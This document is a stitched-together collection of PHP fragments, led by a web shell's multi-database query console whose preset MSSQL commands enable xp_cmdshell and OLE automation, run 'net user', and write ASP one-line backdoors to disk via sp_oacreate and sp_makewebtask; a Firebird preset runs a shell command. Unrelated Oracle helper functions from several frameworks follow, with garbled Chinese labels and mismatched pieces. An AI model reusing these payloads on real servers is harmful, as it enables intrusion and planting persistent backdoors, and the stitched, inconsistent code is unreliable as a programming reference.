\tStr[1] = "select @@version;"; \tStr[2] = "select name from sysdatabases;"; \tStr[3] = "select name from sysobject where type='U';"; \tStr[4] = "select name from syscolumns where id=Object_Id('table_name');"; \tStr[5] = "Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll');"; \tStr[6] = "Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll');"; \tStr[7] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;"; \tStr[8] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;"; \tStr[9] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;"; \tStr[10] = "Exec master.dbo.xp_cmdshell 'net user';"; \tStr[11] = "Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^<%execute(request(char(35)))%^> > c:\\\\1.asp';"; \tStr[12] = "sp_makewebtask @outputfile='d:\\\\web\\\\bin.asp',@charset=gb2312,@query='select ''<%execute(request(chr(35)))%>''' "; \tmsform.mssql.value = Str[i]; \treturn true; } </script> <textarea name="mssql" style="width:600px;height:200px;">{$msquery}</textarea><br> <select onchange="return msFull(options[selectedIndex].value)"> \t<option value="0" selected>ִ������</option> \t<option value="1">��ʾ�汾</option> \t<option value="2">���ݿ�</option> \t<option value="3">����</option> \t<option value="4">�ֶ�</option> \t<option value="5">sp_oacreate</option> \t<option value="6">xp_cmdshell</option> \t<option value="7">xp_cmdshell(2005)</option> \t<option value="8">sp_oacreate(2005)</option> \t<option value="9">����openrowset(2005)</option> \t<option value="10">xp_cmdshell exec</option> \t<option value="10">sp_oamethod exec</option> \t<option value="11">sp_makewebtask</option> </select> <input type="hidden" name="action" value="msquery"> <input class="bt" type="submit" value="Query"></form></div> END; if ($msaction == 'msquery') { $msconn = mssql_connect($mshost, $msuser, $mspass); mssql_select_db($msdbname, $msconn) or die("connect error :" . mssql_get_last_message()); $msresult = mssql_query($msquery) or die(mssql_get_last_message()); echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n"; for ($i = 0; $i < mssql_num_fields($msresult); $i++) { echo '<td><b>' . mssql_field_name($msresult, $i) . "</b></td>\n"; } echo "</tr>\n"; mssql_data_seek($result, 0); while ($msrow = mssql_fetch_row($msresult)) { echo "<tr>\n"; for ($i = 0; $i < mssql_num_fields($msresult); $i++) { echo '<td>' . "{$msrow[$i]}" . '</td>'; } echo "</tr>\n"; } echo "</table></font>"; mssql_free_result($msresult); mssql_close(); } } elseif ($db == "ora") { $orahost = isset($_POST['orahost']) ? $_POST['orahost'] : 'localhost'; $oraport = isset($_POST['oraport']) ? $_POST['oraport'] : '1521'; $orauser = isset($_POST['orauser']) ? $_POST['orauser'] : '******'; $orapass = isset($_POST['orapass']) ? $_POST['orapass'] : '******'; $orasid = isset($_POST['orasid']) ? $_POST['orasid'] : 'ORCL'; $oraaction = isset($_POST['action']) ? $_POST['action'] : ''; $oraquery = isset($_POST['orasql']) ? $_POST['orasql'] : ''; $oraquery = stripslashes($oraquery); print <<<END <form method="POST" name="oraform" action="?s=gg&db=ora"> <div class="actall"> Host:<input type="text" name="orahost" value="{$orahost}" style="width:100px"> Port:<input type="text" name="oraport" value="{$oraport}" style="width:50px"> User:<input type="text" name="orauser" value="{$orauser}" style="width:80px"> Pass:<input type="text" name="orapass" value="{$orapass}" style="width:100px"> SID:<input type="text" name="orasid" value="{$orasid}" style="width:50px"><br> <script language="javascript"> function oraFull(i){ Str = new Array(5); \tStr[0] = ""; \tStr[1] = "select version();"; \tStr[2] = "SELECT NAME FROM V{$DATABASE}"; \tStr[3] = "select * From all_objects where object_type='TABLE'"; \tStr[4] = "select column_name from user_tab_columns where table_name='table1'"; \toraform.orasql.value = Str[i]; \treturn true; } </script> <textarea name="orasql" style="width:600px;height:200px;">{$oraquery}</textarea><br> <select onchange="return oraFull(options[selectedIndex].value)"> \t<option value="0" selected>ִ������</option> \t<option value="1">��ʾ�汾</option> \t<option value="2">���ݿ�</option> \t<option value="3">����</option> \t<option value="4">�ֶ�</option> </select> <input type="hidden" name="action" value="myquery"> <input class="bt" type="submit" value="Query"></div></form> END; if ($oraaction == 'oraquery') { $oralink = OCILogon($orauser, $orapass, "(DEscriptION=(ADDRESS=(PROTOCOL =TCP)(HOST={$orahost})(PORT = {$oraport}))(CONNECT_DATA =(SID={$orasid})))") or die(ocierror()); $oraresult = ociparse($oralink, $oraquery) or die(ocierror()); $orarow = oci_fetch_row($oraresult); echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n"; for ($i = 0; $i < oci_num_fields($oraresult); $i++) { echo '<td><b>' . oci_field_name($oraresult, $i) . "</b></td>\n"; } echo "</tr>\n"; ociresult($oraresult, 0); while ($orarow = ora_fetch_row($oraresult)) { echo "<tr>\n"; for ($i = 0; $i < ora_num_fields($result); $i++) { echo '<td>' . "{$orarow[$i]}" . '</td>'; } echo "</tr>\n"; } echo "</table></font>"; oci_free_statement($oraresult); ocilogoff(); } } elseif ($db == "ifx") { $ifxuser = isset($_POST['ifxuser']) ? $_POST['ifxuser'] : '******'; $ifxpass = isset($_POST['ifxpass']) ? $_POST['ifxpass'] : '******'; $ifxdbname = isset($_POST['ifxdbname']) ? $_POST['ifxdbname'] : 'ifxdb'; $ifxaction = isset($_POST['action']) ? $_POST['action'] : ''; $ifxquery = isset($_POST['ifxsql']) ? $_POST['ifxsql'] : ''; $ifxquery = stripslashes($ifxquery); print <<<END <form method="POST" name="ifxform" action="?s=gg&db=ifx"> <div class="actall">Dbname:<input type="text" name="ifxhost" value="{$ifxdbname}" style="width:100px"> User:<input type="text" name="ifxuser" value="{$ifxuser}" style="width:100px"> Pass:<input type="text" name="ifxpass" value="{$ifxpass}" style="width:100px"><br> <script language="javascript"> function ifxFull(i){ Str = new Array(11); \tStr[0] = ""; \tStr[1] = "select dbservername from sysobjects;"; \tStr[2] = "select name from sysdatabases;"; \tStr[3] = "select tabname from systables;"; \tStr[4] = "select colname from syscolumns where tabid=n;"; \tStr[5] = "select username,usertype,password from sysusers;"; \tifxform.ifxsql.value = Str[i]; \treturn true; } </script> <textarea name="ifxsql" style="width:600px;height:200px;">{$ifxquery}</textarea><br> <select onchange="return ifxFull(options[selectedIndex].value)"> \t<option value="0" selected>ִ������</option> \t<option value="1">���ݿ�����������</option> \t<option value="1">���ݿ�</option> \t<option value="2">����</option> \t<option value="3">�ֶ�</option> \t<option value="4">hashes</option> </select> <input type="hidden" name="action" value="ifxquery"> <input class="bt" type="submit" value="Query"></div></form> END; if ($ifxaction == 'ifxquery') { $ifxlink = ifx_connect($ifcdbname, $ifxuser, $ifxpass) or die(ifx_errormsg()); $ifxresult = ifx_query($ifxquery, $ifxlink) or die(ifx_errormsg()); $ifxrow = ifx_fetch_row($ifxresult); echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n"; for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) { echo '<td><b>' . ifx_fieldproperties($ifxresult) . "</b></td>\n"; } echo "</tr>\n"; mysql_data_seek($ifxresult, 0); while ($ifxrow = ifx_fetch_row($ifxresult)) { echo "<tr>\n"; for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) { echo '<td>' . "{$ifxrow[$i]}" . '</td>'; } echo "</tr>\n"; } echo "</table></font>"; ifx_free_result($ifxresult); ifx_close(); } } elseif ($db == "db2") { $db2host = isset($_POST['db2host']) ? $_POST['db2host'] : 'localhost'; $db2port = isset($_POST['db2port']) ? $_POST['db2port'] : '50000'; $db2user = isset($_POST['db2user']) ? $_POST['db2user'] : '******'; $db2pass = isset($_POST['db2pass']) ? $_POST['db2pass'] : '******'; $db2dbname = isset($_POST['db2dbname']) ? $_POST['db2dbname'] : 'mysql'; $db2action = isset($_POST['action']) ? $_POST['action'] : ''; $db2query = isset($_POST['db2sql']) ? $_POST['db2sql'] : ''; $db2query = stripslashes($db2query); print <<<END <form method="POST" name="db2form" action="?s=gg&db=db2"> <div class="actall">Host:<input type="text" name="db2host" value="{$db2host}" style="width:100px"> Port:<input type="text" name="db2port" value="{$db2port}" style="width:60px"> User:<input type="text" name="db2user" value="{$db2user}" style="width:100px"> Pass:<input type="text" name="db2pass" value="{$db2pass}" style="width:100px"> Dbname:<input type="text" name="db2dbname" value="{$db2dbname}" style="width:100px"><br> <script language="javascript"> function db2Full(i){ Str = new Array(4); \tStr[0] = ""; \tStr[1] = "select schemaname from syscat.schemata;"; \tStr[2] = "select name from sysibm.systables;"; \tStr[3] = "select colname from syscat.columns where tabname='table_name';"; \tStr[4] = "db2 get db cfg for db_name;"; db2form.db2sql.value = Str[i]; return true; } </script> <textarea name="db2sql" style="width:600px;height:200px;">{$db2query}</textarea><br> <select onchange="return db2Full(options[selectedIndex].value)"> \t<option value="0" selected>ִ������</option> \t<option value="1">���ݿ�</option> \t<option value="1">����</option> \t<option value="2">�ֶ�</option> \t<option value="3">���ݿ�����</option> </select> <input type="hidden" name="action" value="db2query"> <input class="bt" type="submit" value="Query"></div></form> END; if ($myaction == 'db2query') { $db2link = db2_connect($db2dbname, $db2user, $db2pass) or die(db2_conn_errormsg()); $db2result = db2_exec($db2link, $db2query) or die(db2_stmt_errormsg()); $db2row = db2_fetch_row($db2result); echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n"; for ($i = 0; $i < db2_num_fields($db2result); $i++) { echo '<td><b>' . db2_field_name($db2result) . "</b></td>\n"; } echo "</tr>\n"; while ($db2row = db2_fetch_row($db2result)) { echo "<tr>\n"; for ($i = 0; $i < db2_num_fields($db2result); $i++) { echo '<td>' . "{$db2row[$i]}" . '</td>'; } echo "</tr>\n"; } echo "</table></font>"; db2_free_result($db2result); db2_close(); } } elseif ($db == "fb") { $fbhost = isset($_POST['fbhost']) ? $_POST['fbhost'] : 'localhost'; $fbpath = isset($_POST['fbpath']) ? $_POST['fbpath'] : ''; $fbpath = str_replace("\\\\", "\\", $fbpath); $fbuser = isset($_POST['fbuser']) ? $_POST['fbuser'] : '******'; $fbpass = isset($_POST['fbpass']) ? $_POST['fbpass'] : '******'; $fbaction = isset($_POST['action']) ? $_POST['action'] : ''; $fbquery = isset($_POST['fbsql']) ? $_POST['fbsql'] : ''; $fbquery = stripslashes($fbquery); print <<<END <form method="POST" name="fbform" action="?s=gg&db=fb"> <div class="actall">Host:<input type="text" name="fbhost" value="{$fbhost}" style="width:100px"> Path:<input type="text" name="fbpath" value="{$fbpath}" style="width:100px"> User:<input type="text" name="fbuser" value="{$fbuser}" style="width:100px"> Pass:<input type="text" name="fbpass" value="{$fbpass}" style="width:100px"><br/> <script language="javascript"> function fbFull(i){ Str = new Array(5); \tStr[0] = ""; \tStr[1] = "select RDB\$RELATION_NAME from RDB\$RELATIONS;"; \tStr[2] = "select RDB\$FIELD_NAME from RDB\$RELATION_FIELDS where RDB\$RELATION_NAME='table_name';"; \tStr[3] = "input 'D:\\createtable.sql';"; \tStr[4] = "shell netstat -an;"; fbform.fbsql.value = Str[i]; return true; } </script> <textarea name="fbsql" style="width:600px;height:200px;">{$fbquery}</textarea><br> <select onchange="return fbFull(options[selectedIndex].value)"> \t<option value="0" selected>ִ������</option> \t<option value="1">����</option> \t<option value="2">�ֶ�</option> \t<option value="3">����sql</option> \t<option value="4">shell</option> </select> <input type="hidden" name="action" value="fbquery"> <input class="bt" type="submit" value="Query"></div></form> END; if ($fbaction == 'fbquery') { $fblink = ibase_connect($fbhost . ':' . $fbpath, $fbuser, $fbpass) or die(ibase_errmsg()); $fbresult = ibase_query($fblink, $fbquery) or die(ibase_errmsg()); echo '<font face="verdana"><table border="1" cellpadding="1" cellspacing="2">' . "\n<tr>\n"; for ($i = 0; $i < ibase_num_fields($fbresult); $i++) { echo '<td><b>' . ibase_field_info($fbresult, $i) . "</b></td>\n"; } echo "</tr>\n"; ibase_field_info($fbresult, 0); while ($fbrow = ibase_fetch_row($fbresult)) { echo "<tr>\n"; for ($i = 0; $i < ibase_num_fields($fbresult); $i++) { echo '<td>' . "{$fbrow[$i]}" . '</td>'; } echo "</tr>\n"; } echo "</table></font>"; ibase_free_result($fbresult); ibase_close(); } } }
function query($query) { $this->res = $this->error = ''; switch ($this->db) { case 'MySQL': if (false === ($this->res = @mysql_query('/*' . chr(0) . '*/' . $query, $this->connection))) { $this->error = @mysql_error($this->connection); return 0; } else { if (is_resource($this->res)) { return 1; } } return 2; break; case 'MSSQL': if (false === ($this->res = @mssql_query($query, $this->connection))) { $this->error = 'Query error'; return 0; } else { if (@mssql_num_rows($this->res) > 0) { return 1; } } return 2; break; case 'PostgreSQL': if (false === ($this->res = @pg_query($this->connection, $query))) { $this->error = @pg_last_error($this->connection); return 0; } else { if (@pg_num_rows($this->res) > 0) { return 1; } } return 2; break; case 'Oracle': if (false === ($this->res = @ociparse($this->connection, $query))) { $this->error = 'Query parse error'; } else { if (@ociexecute($this->res)) { if (@ocirowcount($this->res) != 0) { return 2; } return 1; } $error = @ocierror(); $this->error = $error['message']; } break; } return 0; }
/** * return sql error array * @access private */ function _sql_error() { $error = @ocierror(); $error = !$error ? @ocierror($this->query_result) : $error; $error = !$error ? @ocierror($this->db_connect_id) : $error; if ($error) { $this->last_error_result = $error; } else { $error = isset($this->last_error_result) && $this->last_error_result ? $this->last_error_result : array(); } return $error; }
/** * This function will connect to the database, execute a query and will return the result handle. * * @param $sql The SQL statement to execute. * * @returns Handle to the result of the query. * * @internal */ function _connectAndExec($sql) { $this->_logSql($sql); $this->connect(); $stmt = OCIParse($this->_conn, $sql); if (!$stmt) { $error = ocierror($stmt); trigger_error($error['message'], YD_ERROR); } $result = @OCIExecute($stmt); if (!$result) { $error = ocierror($stmt); if (!empty($error['sqltext'])) { $error['message'] .= ' (SQL: ' . $error['sqltext'] . ')'; } trigger_error($error['message'], YD_ERROR); } return $stmt; }
function sti_oracle_get_data($connection_string, $data_source_name, $query) { $info = sti_oracle_parse_connection_string($connection_string); if ($info["privilege"] == "") { $conn = oci_connect($info["user_id"], $info["password"], $info["database"], $info["charset"]); } else { $conn = oci_pconnect($info["user_id"], $info["password"], $info["database"], $info["charset"], $info["privilege"]); } if ($conn === false) { $err = ocierror(); return "ServerError:Could not connect {$err['message']}"; } $query = sti_parse_query_parameters($query); $stmt = oci_parse($conn, $query); if ($stmt === false) { $err = oci_error($conn); return "ServerError:Parse Error {$err['message']}"; } else { if (strpos($query, "cursor") !== false) { $curs = oci_new_cursor($conn); oci_bind_by_name($stmt, "cursor", $curs, -1, OCI_B_CURSOR); } if (oci_execute($stmt, OCI_COMMIT_ON_SUCCESS) === true) { if (isset($curs)) { if (oci_execute($curs, OCI_DEFAULT) === false) { $err = oci_error(); return "ServerError:Cursor Execute Error {$err['message']}"; } $stmt_curs = $curs; } else { $stmt_curs = $stmt; } $ncols = oci_num_fields($stmt_curs); $column_names = array(); $column_types = array(); for ($i = 1; $i <= $ncols; $i++) { $column_names[] = oci_field_name($stmt_curs, $i); $column_type = oci_field_type($stmt_curs, $i); $column_precision = oci_field_precision($stmt_curs, $i); $column_types[] = sti_oracle_get_column_type($column_type, $column_precision); } $xml_output = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<Database>"; oci_fetch_all($stmt_curs, $data); for ($i = 0; $i < count($data[$column_names[0]]); $i++) { $xml_output .= "<{$data_source_name}>"; for ($j = 0; $j < count($column_names); $j++) { $value = $data[$column_names[$j]][$i]; if ($column_types[$j] == "base64Binary") { $value = base64_encode($value); } if ($column_types[$j] == "dateTime" && strlen($value) > 0 && strpos($value, ".") > 0) { $values = preg_split("/\\./", $value); if (count($values) >= 3) { if (strlen($values[2]) > 2) { $value = $values[2] . '-' . $values[1] . '-' . $values[0]; } else { $value = ((int) $values[2] >= 30 ? '19' . $values[2] : '20' . $values[2]) . '-' . $values[1] . '-' . $values[0]; } } } else { $value = str_replace("&", "&", $value); $value = str_replace("<", "<", $value); $value = str_replace(">", ">", $value); } $xml_output .= "<{$column_names[$j]}>{$value}</{$column_names[$j]}>"; } $xml_output .= "</{$data_source_name}>"; } $xml_output .= "</Database>"; if (isset($curs)) { oci_free_statement($curs); } oci_free_statement($stmt); } else { $err = ocierror($stmt); return "ServerError:Execute Error {$err['message']} {$query}"; } } return $xml_output; }
} else { echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to PostgreSQL server</b></font></div>"; } break; case 'Oracle': $db = @ocilogon($_POST['mysql_l'], $_POST['mysql_p'], $_POST['mysql_db']); if ($error = @ocierror()) { echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to Oracle server.<br>" . $error['message'] . "</b></font></div>"; } else { $querys = @explode(';', $_POST['db_query']); foreach ($querys as $num => $query) { if (strlen($query) > 5) { echo "<font face=Verdana size=-2 color=green><b>Query#" . $num . " : " . htmlspecialchars($query) . "</b></font><br>"; $stat = @ociparse($db, $query); @ociexecute($stat); if ($error = @ocierror()) { echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>" . $error['message'] . "</b></font></td></tr></table><br>"; } else { $rowcount = @ocirowcount($stat); if ($rowcount != 0) { echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>" . $rowcount . "</b></font></td></tr></table><br>"; } else { echo "<table width=100%><tr>"; for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td bgcolor=#cccccc><font face=Verdana size=-2><b> " . htmlspecialchars(@ocicolumnname($stat, $j)) . " </b></font></td>"; } echo "</tr>"; while (ocifetch($stat)) { echo "<tr>"; for ($j = 1; $j <= @ocinumcols($stat); $j++) { echo "<td><font face=Verdana size=-2> " . htmlspecialchars(@ociresult($stat, $j)) . " </font></td>";
function execute($sql, $inputarr = null, $throw = true) { if ($this->enableLog) { $this->log[] = $sql; log_message("sql: {$sql}", 'debug'); } $this->querycount++; $stmt = ociparse($this->conn, $sql); if (is_array($inputarr)) { foreach (array_keys($inputarr) as $k) { ocibindbyname($stmt, $k, $inputarr[$k], -1); } } if ($stmt && ociexecute($stmt, $this->_commitMode)) { $this->_lastrs = $stmt; $this->lasterr = null; $this->lasterrcode = null; return $stmt; } $err = ocierror($stmt); $this->lasterr = $err['message']; $this->lasterrcode = $err['code']; if ($throw) { FLEA::loadClass('FLEA_Db_Exception_SqlQuery'); __THROW(new FLEA_Db_Exception_SqlQuery($sql, $this->lasterr, $this->lasterrcode)); } return false; }
/** * The error message number * * @access private * @return integer */ function _error_number() { $error = ocierror($this->conn_id); return $error['code']; }
/** * return sql error array * @access private */ function _sql_error() { if (function_exists('ocierror')) { $error = @ocierror(); $error = !$error ? @ocierror($this->query_result) : $error; $error = !$error ? @ocierror($this->db_connect_id) : $error; if ($error) { $this->last_error_result = $error; } else { $error = isset($this->last_error_result) && $this->last_error_result ? $this->last_error_result : array(); } } else { $error = array('message' => $this->connect_error, 'code' => ''); } return $error; }
/** * This function will connect to the database, execute a query and will return the result handle. * * @param $sql The SQL statement to execute. * * @returns Handle to the result of the query. In case of an error, this function triggers an error. * * @internal */ function &_connectAndExec($sql) { // Add the table prefix $sql = str_replace(' #_', ' ' . YDConfig::get('YD_DB_TABLEPREFIX', ''), $sql); // Update the language placeholders $languageIndex = YDConfig::get('YD_DB_LANGUAGE_INDEX', null); if (!is_null($languageIndex)) { $sql = str_replace('_@', '_' . $languageIndex, $sql); } // Connect $result = $this->connect(); // Handle errors if (!$result && $this->_failOnError === true) { $error = ocierror(); trigger_error($error['message'], YD_ERROR); } // Record the start time $timer = new YDTimer(); // Create statement $stmt = OCIParse($this->_conn, $sql); // Handle errors if (!$stmt && $this->_failOnError === true) { $error = ocierror($stmt); trigger_error($error['message'], YD_ERROR); } // Execute $result = @OCIExecute($stmt); // Handle errors if ($result === false && $this->_failOnError === true) { $error = ocierror($stmt); if (!empty($error['sqltext'])) { $error['message'] .= ' (SQL: ' . $error['sqltext'] . ')'; } echo '<b>Stacktrace:</b> <pre>' . YDDebugUtil::getStackTrace() . '</pre>'; echo '<b>SQL Statement:</b> <pre>' . $this->formatSql($sql) . '</pre>'; trigger_error($error['message'], YD_ERROR); } // Log the statement $this->_logSql($sql, $timer->getElapsed()); // Return the result return $stmt; }
/** * delete a single instance * * @param One_Model $model */ public function delete(One_Model $model) { $scheme = One_Repository::getScheme($model->getSchemeName()); $db = $this->db($scheme); // determine table to insert into $table = $this->getTable($scheme); $sql = 'DELETE FROM ' . $table; $idAttr = $scheme->getIdentityAttribute(); $id = $idAttr->getName(); $value = $model->{$id}; $value = $idAttr->toString(mysql_real_escape_string($value, $db)); $sql .= ' WHERE `' . $id . '` = ' . $value; // execute query $stid = oci_parse($db, $sql); if ($stid === false) { throw new One_Exception(ocierror() . '<br />' . $sql); } $status = oci_execute($stid); if ($status === false) { throw new One_Exception(ocierror() . '<br />' . $sql); } }